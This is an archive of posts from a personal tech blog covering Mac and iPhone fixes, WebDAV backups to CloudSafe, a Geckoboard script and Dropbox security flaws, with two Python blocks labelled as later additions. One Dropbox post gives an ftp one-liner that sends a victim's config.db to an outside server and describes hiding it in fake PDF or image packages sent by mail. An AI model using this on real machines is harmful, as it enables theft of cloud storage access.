New blog address: http://blog.valerio.de/

Congratulations to Posterous for being bought by Twitter. But I admit I am quite worried about Posterous' future. So I spent some minutes transferring my blog to http://blog.valerio.de/

It is now run by Tumblr. And if I ever want to transfer it to a third blog service provider, the personal subdomain "blog.valerio.de" will not change anymore.

I will try to add some more posts about Apple products in general and maybe some new posts about my startup experiences. But the new posts will definitely not be published at Posterous anymore.

Hidden local backups with Mac OS X Lion filling up your MacBook hard disk!

[Blog moved to: http://blog.valerio.de/post/19238158977/hidden-local-backups-with-mac-os-x-lion-filling-up-your ]

- You have a MacBook or MacBook Air running Mac OS X Lion?

- Ever wondered why you are losing GBs worth of hard disk space every day?

- Using Time Machine?

 

Apple decided to implement a new "feature" in Lion that no one seems to be aware of: local backups whenever your Time Machine drive is not connected to your computer. It seems to affect only Mac laptops, not desktop Macs. So every time your Time Machine backup starts without the destination drive, it copies all data into a secure folder on your local startup volume called ".MobileBackups". If you go to "About this Mac" and "More information" and check the "hard disk" tab, you will find some information on how many GB are used for "Backup". In my case there were 35GB stored on my local drive, without me even noticing.

It's great if you are travelling and accidentally deleted a document. But this feature takes up a lot of storage. Maybe it would be easier to wait and use the Time Machine backup back at home?

 

Don't worry, you can still disable this "feature":

Open up the Terminal App and type

sudo tmutil disablelocal

It will take a while for the system to delete the folder. It is renamed instantly to ".MobileBackups.trash" and subsequently deleted. You will notice a slower Mac and the fans may start up. But after a few minutes everything should be back to normal.


iPhone problems: Personal Hotspot, Push Notifications, APN configurations. All fixed!

Well, a few weeks ago I had a look at "Onavo", a startup focusing on reducing the amount of data your iPhone sends and receives while not on WiFi. As we all know there are a lot of reasons for this, since most data plans for the iPhone are somehow restricted: either you have to pay additional fees or your speed is reduced until your next payment is due. And then there are the outrageously high roaming fees for using your iPhone abroad.

I tried Onavo as one of the very early adopters and realized it was not working for me! Onavo is a small app you download from the Apple App Store. The app asks you for a short registration and sends you a "profile". Basically this profile adds a proxy server configuration to your existing data configuration to compress all your data. And there was the problem: I could not install this configuration. As much as I tried, I always got the message "Only one APN configuration can be installed at a time." Well, I did not have any primary APN configuration installed, so I thought this must be Onavo's fault.

Last week I found the solution! Basically, my iPhone is "jailbroken" and I had installed a few useless software gimmicks like "MakeItMine" months ago. Guess what! One of these small tools installed a specific carrier settings file that is loaded by the iPhone instead of the regular carrier settings file! So as long as this file exists, the iPhone never loads the original carrier settings file, even if the original one gets changed or updated with new features. This causes three problems that a lot of people had to deal with, me included:

- No extra APN configuration (as for Onavo)

- No working push notification on the mobile network

- No "personal hotspot" settings visible

Finally, I found the solution on Onavo's support forum: 

 

1) Make sure your iPhone is jailbroken. But since this only affects jailbroken devices, this should be no problem for you.

2) Install "Terminal" via Cydia and start it. Or alternatively just log into your iPhone via SSH if you have OpenSSH installed.

3) Enter this command:

rm /private/var/Managed\ Preferences/mobile/com.apple.managedCarrier.plist

4) Restart your phone

 

That's it. All problems solved. Magic!

In my case it gave me the missing "Personal Hotspot" settings and fixed Apple push notifications while not on WiFi. And it solved my installation problems with "Onavo". What a great day :)

By the way: since then I have saved roughly 50% of my data traffic while abroad. So I really invite you to try Onavo: http://itunes.apple.com/us/app/onavo/id423545287?mt=8

 

CloudSafe and WebDAV

Well, we just updated our WebDAV server code at CloudSafe.com to make sure we cover all requirements of the WebDAV specification.

It took a few weeks to collect all kinds of bugs people were experiencing with different WebDAV clients on different platforms. Now we have made sure we are 100% compliant with the WebDAV protocol specified in RFC 2518. Not a lot of commercial WebDAV storage providers comply with all WebDAV specifications.

To test WebDAV compliance there is a small tool called "litmus" (http://www.webdav.org/neon/litmus/). It runs a bunch of requests and evaluates all responses sent by the WebDAV server. You will be surprised how many online storage providers do not pass the test.
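The kind of check litmus performs, as an added example that is not part of the original post or of CloudSafe's code: parsing a PROPFIND 207 Multi-Status response (RFC 2518, namespace "DAV:") and honouring the per-propstat status, so a property the server reports as 404 is not mistaken for an empty value. The response body is constructed for this example, not captured from a real server.

```python
import xml.etree.ElementTree as ET

DAV = "{DAV:}"  # Clark-notation prefix for the RFC 2518 "DAV:" namespace

# Constructed 207 Multi-Status body, as a server would answer
# "PROPFIND /safe/" with "Depth: 1" (not captured from CloudSafe).
SAMPLE_MULTISTATUS = """<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
  <D:response>
    <D:href>/safe/</D:href>
    <D:propstat>
      <D:prop>
        <D:resourcetype><D:collection/></D:resourcetype>
        <D:displayname>safe</D:displayname>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>/safe/backup-2011-07-05.tar.gz</D:href>
    <D:propstat>
      <D:prop>
        <D:resourcetype/>
        <D:getcontentlength>104857600</D:getcontentlength>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
    <D:propstat>
      <D:prop><D:getetag/></D:prop>
      <D:status>HTTP/1.1 404 Not Found</D:status>
    </D:propstat>
  </D:response>
</D:multistatus>
"""

def parse_multistatus(body):
    """Return {href: {"is_collection": bool, "props": {name: text}}}.

    Only propstat blocks with a 2xx status contribute properties; a 404
    propstat means "server has no such property", not "empty value".
    """
    root = ET.fromstring(body)
    resources = {}
    for resp in root.findall(DAV + "response"):
        href = resp.findtext(DAV + "href", "").strip()
        entry = {"is_collection": False, "props": {}}
        for ps in resp.findall(DAV + "propstat"):
            parts = ps.findtext(DAV + "status", "").split()  # "HTTP/1.1 200 OK"
            code = int(parts[1]) if len(parts) > 1 else 0
            if not 200 <= code < 300:
                continue
            for prop in ps.find(DAV + "prop"):
                name = prop.tag.replace(DAV, "")
                if name == "resourcetype":
                    # A collection (directory) carries a DAV:collection child
                    entry["is_collection"] = prop.find(DAV + "collection") is not None
                else:
                    entry["props"][name] = (prop.text or "").strip()
        resources[href] = entry
    return resources
```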

 

Now you should not have the slightest problem connecting via WebDAV to your online safes at CloudSafe. You can try this using our free Windows client or our free iPhone and iPad client. Make sure you enable WebDAV for every safe you want to access.

 

 

Using CloudSafe for off-site server backups

Today I decided to upload some of our Linux server backups to https://secure.cloudsafe.com/. Since CloudSafe offers free WebDAV access to all user safes, I thought it would be nice to have my backup files uploaded regularly to a dedicated safe without having to intervene manually. So I wanted to share some information with you on how to mount a CloudSafe safe as a regular network drive within Linux.

 

Creating a safe at CloudSafe.com

 

(1) Login into CloudSafe


(2) Create a safe


(3) Go to the safe overview and enable WebDAV access


(4) Write down the credentials


 

 

Preparing your server


(1) Install davfs2 (a WebDAV file system based on FUSE):

On Ubuntu this is a single line:

apt-get install davfs2

For other Linux installation guides please have a look at: http://savannah.nongnu.org/projects/davfs2

 

(2) Put the WebDAV URL, login name and login password of your safe in a config file to automate login:

echo "(WebDAV URL)   (login name)   (login password)" >> /etc/davfs2/secrets

For example:

echo "https://2078622604.webdav.cloudsafe.com/   support@cloudsafe.com   BJAPQC-L6AEN4-CNRHBQ-HWVUKI" >> /etc/davfs2/secrets

 

(3) Make sure the file cache is large enough if you plan to upload big files.

echo "cache_size      100000  " >> /etc/davfs2/davfs2.conf

 

echo "use_expect100   0        " >> /etc/davfs2/davfs2.conf

 

(4) Create a mount point for your safe

mkdir -p /mnt/safe

Now you are ready to mount your safe into your server's file system.


Mounting the safe to your file system

 

(1) Mount your safe to /mnt/safe with a single line:

mount.davfs (WebDAV URL) /mnt/safe -o _netdev,noexec,nosuid

Use your safe's URL, for example:

mount.davfs https://2078622604.webdav.cloudsafe.com/ /mnt/safe -o _netdev,noexec,nosuid

Now you can copy any data between your server and your CloudSafe safe at /mnt/safe. Just remember that transferring your files to and from CloudSafe takes some time. If you upload a few GB of data, it could take a few minutes before they show up in CloudSafe.

 

If you want to unmount the safe from your file system, use this line:

umount.davfs /mnt/safe

We use this with multiple mount points as well to automatically distribute some server data to non-technical staff. So in case they need to access some of the information, they do not have to rely on some tech wiz with VPN and ssh access.



 

 

 

 

Dropbox and (In-) Security

I stumbled across an amazing piece of security analysis by Derek Newton concerning "DropBox". You should take a few minutes and have a look at it: "Dropbox authentication: insecure by design" http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids

In general it says that once you get one-time read access to a specific file within the user folder of someone using Dropbox, you will always have access to this user's Dropbox, even from another computer. Dropbox stores all important authentication information in a database file named "config.db" within the hidden folder "~/.dropbox". Once you get this file you can copy it to another Dropbox installation and you will receive all content of the Dropbox folder. Worst part: the owner will not even notice that you get an exact copy of his files. And you will get all updates as well. Even after changing the user password you will still have full access, since authentication is based on a single host key.

Basically, the owner has to detach his client computer from his Dropbox account and then re-attach it. So this means a full delete and a full restore of all his files. I know this sounds like a lot of work, but remember: otherwise you will not even be aware if someone is getting an exact copy of all your Dropbox files delivered by Dropbox to a location of his choice!

 

I did some testing here in the office and found quite a few possible ways to get to the file. Since we all use Macs here I will not go into details about Windows PCs, but there are similar ways to extract the one file:

 

(a) Just start a Mac with an installation DVD. Then use the password reset utility to get access to the user account you want to compromise. After that it's only a login and a quick copy of the file. The user will not be able to access his account and will probably use the same password reset utility to regain access. But he will assume all his passwords are still safe since he stored them in Apple's keychain (which is not affected by the password reset).

Solution: Use "FileVault". I know it has a bad reputation, because you cannot use it in a reasonable way with Time Machine and some hard disk problems can prevent full account access. Still, your "config.db" file will be safely encrypted.

 

(b) I wrote one line to copy the Dropbox config file to one of our FTP servers:

ftp -u  ftp://user:password@ourftpserver.com/config.db.backup.$RANDOM ~/.dropbox/config.db

That's it! I did some "camouflaging" then, putting the line into different packages, like fake PDF or picture files. Apple's firewall settings do not care about traffic originating from your computer. And FTP is not blocked. As soon as you start the script you are doomed.

In our testing sometimes a warning showed up mentioning to open "a program that was attached to a Mail". Well, consider this mail comes from someone you trust or has an unsuspicious name ending in ".pdf" or ".jpg". Would you stop there?

Solution: Install "Little Snitch" or any other tool to monitor outgoing traffic. And make sure you take a good look at the warning messages as well. I realized that a lot of Mac users are still not used to malware at all.

 

I hope Dropbox will change their client authentication totally. And quite soon!

I am still quite puzzled how few Dropbox users have realized so far how dangerous this security flaw is.

 

[Disclosure: I am MD of a company providing encrypted online storage at https://secure.cloudsafe.com/ . Although our products are quite different we may have some clients using both products. But I want to address Dropbox security issues since my main concern is security of web services in general.]

Apple FaceTime in Germany: How to get FaceTime 1.0 to work on a German OS X

Well, I installed Apple FaceTime 1.0 from the Mac App Store yesterday, just to find out it will not work on a German Mac OS X. Somehow the German quality control department at Apple did not do their homework. The English version will work! There is an easy workaround: delete the German localization of the FaceTime app and everything will work fine.

And now once more in German: the German localization of Apple FaceTime 1.0 prevents FaceTime from establishing any calls! As a quick fix, simply delete the files of the German localization and it works again.

 

(1) Show the package contents of the FaceTime app. To do so, right-click the FaceTime app and choose "Show Package Contents":


(2) Open the "Resources" folder inside the "Contents" folder:


(3) Right-click the "German.lproj" folder and choose "Move to Trash":


(4) Now enter your login password once.


(5) Restart FaceTime. Everything is in English now, but the program works again. Problem solved.

 

I hope Apple fixes this soon. Once it does, first move the FaceTime app to the Trash and then download it again from the Mac App Store.

 

Geckoboard: How to securely include database metrics in your dashboard

For a couple of months we had been planning to implement a little dashboard to see core metrics for our startup CloudSafe (http://www.cloudsafe.com). Until now I spent quite a few minutes a day extracting database information and Google Analytics data and adding them together in an Excel file to get my daily statistics.

Not anymore! I automated the process in a few simple steps using Geckoboard (http://www.geckoboard.com):

 

1) Make sure you know which data to extract from your database. In our case I have some easy SQL statements to get key metrics from our databases. I put them in a single file "sql.sql":

 

select count(*) as Allusers from users;

select count(*) as Allusers_yesterday from users u where u.created_at < timestamptz('today') ;

etc.

 

2) Then I make sure a script gets the values:

psql -h [database-server] -U [username] -p [port] [database] < sql.sql

To be precise, I use this line within an ssh statement so I can run it from another machine outside the database server but within our site's VPN:

ssh -l [username database-server] [database-server] 'psql -h localhost -U [username] [database] < sql.sql' >> stat.txt

The output of my database queries is dumped into the file "stat.txt".

 

3) Then I use various "sed" commands to extract my data from the "stat.txt" file, e.g. sed -n '5'p stat.txt >> xml.txt to get the value on line 5 of my "stat.txt" file.

These are converted to valid XML for use with Geckoboard. The easiest implementation is adding <?xml version="1.0" encoding="UTF-8"?> <root><item><value> before and </value> <text></text> </item> <item><value> </value><text></text></item></root> after the value you want to present.

 

4) Now I upload the data in XML format to a less secured (DMZ) site outside our production network, within a directory that can be accessed via the web.

scp xml.txt [username dmz-server]@[dmz-server]:[path]xmlexport.txt

 

5) Then I use a custom widget within Geckoboard and point it at the external URL of my "xmlexport.txt" file on our DMZ server.

 

The script runs every hour and makes sure I can access reasonably fresh data wherever I go, without the need for established VPN and ssh connections.
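Steps 2 and 3 above in one place, as an added example that is not the author's script: it reads psql's output (stat.txt) by column name rather than by line number, and builds the Geckoboard number-widget XML described above with an XML library, so values and labels are escaped instead of being spliced into a string. The stat.txt content is constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of psql's default aligned output for the two queries
# in the post (psql folds unquoted aliases to lower case). Not a capture
# from a real CloudSafe database.
SAMPLE_STAT_TXT = """\
 allusers 
----------
    12345
(1 row)

 allusers_yesterday 
--------------------
              12290
(1 row)
"""


def parse_psql_output(text):
    """Map every single-column psql result to its value, keyed by column name.

    psql prints the header, a rule of dashes, the row(s), then "(N rows)".
    Keying on the header rather than a fixed line number (sed -n '5'p) keeps
    working when a query is added to or reordered in the SQL file.
    """
    lines = text.splitlines()
    metrics = {}
    for i, line in enumerate(lines):
        if re.fullmatch(r"-+", line.strip()) and 0 < i < len(lines) - 1:
            name = lines[i - 1].strip()
            value = lines[i + 1].strip()
            if not value.startswith("("):  # "(0 rows)": query returned nothing
                metrics[name] = value
    return metrics


def geckoboard_number_xml(value, previous, label=""):
    """Build the Geckoboard "number and secondary stat" XML the post uses.

    ElementTree escapes the content, so a label containing '<' or '&' cannot
    break the document the way shell string concatenation would.
    """
    root = ET.Element("root")
    for v in (value, previous):
        item = ET.SubElement(root, "item")
        ET.SubElement(item, "value").text = str(v)
        ET.SubElement(item, "text").text = label
    return '<?xml version="1.0" encoding="UTF-8"?>' + ET.tostring(root, encoding="unicode")


def build_export(stat_txt, current="allusers", previous="allusers_yesterday"):
    """stat.txt content -> xmlexport.txt content for one dashboard widget."""
    metrics = parse_psql_output(stat_txt)
    return geckoboard_number_xml(metrics[current], metrics[previous], label="users")
```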

 

If you have any questions, feel free to contact me.

 

 

 

 

 

 

Dropbox: Security of shared folders - beware!

Well, we spent some time in the last few days evaluating some Dropbox features. Since we will be offering a product in the area of secure cloud storage, we are considering using the Dropbox API to import data from Dropbox.

So a business friend of mine sent me a link to share a folder with me. And I found at least two security flaws within Dropbox:

 

#1:

I clicked on the link to get access to the folder. But I forgot that my wife had used Dropbox in my browser before to download a file. So the folder ended up attached to my wife's account, not mine. Dropbox does not verify the recipient of the invitation link. So basically the first one to use the link gets access, no questions asked.

 

#2:

The business friend sent me another invitation. This time I made sure I was logged into my account. He does not have a premium account; I do. So just for fun I clicked "Show deleted files" while having his folder in the browser window. Guess what? I could see all files he had deleted from this folder. I could undelete them and then download them. I am quite sure that's not what he intended! There were quite a lot of documents clearly not intended for me to see.

I called him up and asked him about the files. Well, since he does not have a premium account he did not even know the files were still there! So basically I had more access rights to the folder than he, the owner, did!

 

Don't get me wrong: I love Dropbox for easy file sharing. But I would never use Dropbox to set up file sharing in a business environment. There are too many mistakes one can make that get documents into the wrong hands.

First serious Mac OS X "trojan horse" application found...

Well, well, this time it seems Intego was right: they just discovered one of the first malicious "trojan horse" apps for Mac OS X!

These are the applications that carry the trojan:

Screensavers:

  • Secret Land ScreenSaver v.2.8
  • Color Therapy Clock ScreenSaver v.2.8
  • 7art Foliage Clock ScreenSaver v.2.8
  • Nature Harmony Clock ScreenSaver v.2.8
  • Fiesta Clock ScreenSaver v.2.8
  • Fractal Sun Clock ScreenSaver v.2.8
  • Full Moon Clock ScreenSaver v.2.8
  • Sky Flight Clock ScreenSaver v.2.8
  • Sunny Bubbles Clock ScreenSaver v.2.9
  • Everlasting Flowering Clock ScreenSaver v.2.8
  • Magic Forest Clock ScreenSaver v.2.8
  • Freezelight Clock ScreenSaver v.2.9
  • Precious Stone Clock ScreenSaver v.2.8
  • Silver Snow Clock ScreenSaver v.2.8
  • Water Color Clock ScreenSaver v.2.8
  • Love Dance Clock ScreenSaver v.2.8
  • Galaxy Rhythm Clock ScreenSaver v.2.8
  • 7art Eternal Love Clock ScreenSaver v.2.8
  • Fire Element Clock ScreenSaver v.2.8
  • Water Element Clock ScreenSaver v.2.8
  • Emerald Clock ScreenSaver v.2.8
  • Radiating Clock ScreenSaver v.2.8
  • Rocket Clock ScreenSaver v.2.8
  • Serenity Clock ScreenSaver v.2.8
  • Gravity Free Clock ScreenSaver v.2.8
  • Crystal Clock ScreenSaver v.2.6
  • One World Clock ScreenSaver v.2.8
  • Sky Watch ScreenSaver v.2.8
  • Lighthouse Clock ScreenSaver v.2.8

Application

The screensavers are all made by one company: 7art-screensavers (http://7art-screensavers.com)

 

I checked the owner of "7art-screensavers.com" and found:

Alex Korsakoff and Roman Rusavsky; P.O.Box 464; 111555; Moscow; Russia

 

Most times Intego had a press release about some "dangerous" application for Mac, I considered their information highly dramatized to push their VirusBarrier product.

But this time I have to admit I see a point in getting some antivirus protection for my Mac... just not VirusBarrier, since I had a dozen kernel panics using it in February. I hope they have done some serious bug fixing by now.

Read their blog entry here: http://blog.intego.com/2010/06/01/preliminary-list-of-applications-that-insta...